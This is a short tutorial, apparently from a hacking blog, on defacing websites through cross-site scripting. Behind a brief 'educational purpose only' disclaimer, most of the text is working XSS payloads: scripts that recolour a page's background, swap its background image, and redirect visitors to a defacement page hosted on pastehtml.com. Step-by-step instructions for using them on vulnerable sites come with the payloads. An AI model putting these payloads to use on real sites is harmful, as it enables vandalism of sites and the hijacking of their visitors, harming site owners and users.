Never implement this technique. I am just explaining it for educational purpose only.

Defacing is one of the most common thing when the hacker found the vulnerability in website. Defacing is changing the content the website hacker content. Most of time, attacker use this technique to inform about the vulnerability to Admin. But it’s bad idea..!

Script for chaning the background Color of a website:<script>document.body.bgColor=”red”;</script>

Script for chaning the background image of a website:<script>document.body.background=”http://your_image.jpg“;</script>

Defacement Page with Pastehtml:

First of all upload some defacement page(html) to pastehtml.com and get the link.

When you find a XSS vulnerable site, then insert the script as :<script>window.location=”http://www.pastehtml.com/Your_Defacement_link”;</script>